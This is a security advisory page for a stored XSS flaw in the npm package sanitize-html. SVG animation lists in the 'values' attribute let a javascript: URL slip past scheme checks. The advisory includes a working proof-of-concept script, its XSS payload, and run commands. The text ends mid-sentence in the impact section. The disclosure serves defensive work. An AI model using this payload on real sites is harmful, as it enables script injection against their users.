mediumCVSS 5.4Vulnerability

CVE-2026-84371

### Summary When SVG animation is allowed, `attributeName="href"` makes `values` a list of URL destinations. `sanitize-html` accepts a list that starts with a safe fragment even when `values` is explicitly scheme-checked, allowing a later `javascript:` destination to execute when the sanitized link is activated. ### Details `index.js:371-383` validates each attribute as one flat URL. It does not recognize that `attributeName="href"` gives the sibling `values` attribute SMIL URI-list semantics. For `values="#safe;javascript:..."`, the leading fragment passes the flat check and the complete list is retained. ### PoC This was reproduced with `[email protected]` and Chromium 150.0.7871.124. The configuration adds SVG animation to the defaults and applies the existing scheme policy to `values`; it does not allow `javascript:`. Save this as `poc.js`: ```js const sanitize = require('sanitize-html'); const input = `<svg><a><animate attributeName="href" values="#safe;javascript:alert('XSS')" dur=".01s" fill="freeze"></animate><text y="30">Click me</text></a></svg>`; const output = sanitize(input, { allowedTags: sanitize.defaults.allowedTags.concat(['svg', 'animate', 'text']), allowedAttributes: { ...sanitize.defaults.allowedAttributes, animate: ['attributename', 'values', 'dur', 'fill'], text: ['y'] }, allowedSchemesAppliedToAttributes: sanitize.defaults.allowedSchemesAppliedToAttributes.concat(['values']) }); console.log(output); ``` Install and run it, then open `poc.html` and click `Click me`: ```sh npm install [email protected] node poc.js > poc.html ``` The output retains the `javascript:` entry, and clicking the sanitized SVG displays `XSS`. With `input` changed to `<a href="javascript:alert(1)">control</a>`, the same configuration removes `href`. ### Impact In an application that accepts attacker-authored SVG animation, the attacker can store this payload without scripts or event handlers. A victim who activates the sanitized link

Properties

ghsa_id
GHSA-g8qq-57p8-ggw5
severity
medium
summary
ApostropheCMS: Stored XSS via SVG SMIL URI-list scheme-policy bypass
cvss_score
5.4
cve_id
CVE-2026-84371
cvss_vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
is_ghsa_only
false
ghsa_published
2026-09-01T21:20:01Z
source_url
https://github.com/advisories/GHSA-g8qq-57p8-ggw5
ghsa_updated
2026-09-01T21:21:20Z

Related Entities (4)

VULNERABLE_TO (1)

[Software]npm/sanitize-html

AFFECTS (1)

[Software]npm/sanitize-html

HAS_WEAKNESS (1)

[Weakness]Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

REPORTED_BY (1)

[Source]GitHub Advisory Database

Explore deeper with Ninja Signal's threat intelligence graph

CVE-2026-84371 (CVSS 5.4) — Ninja Signal Threat Intelligence | Ninja Signal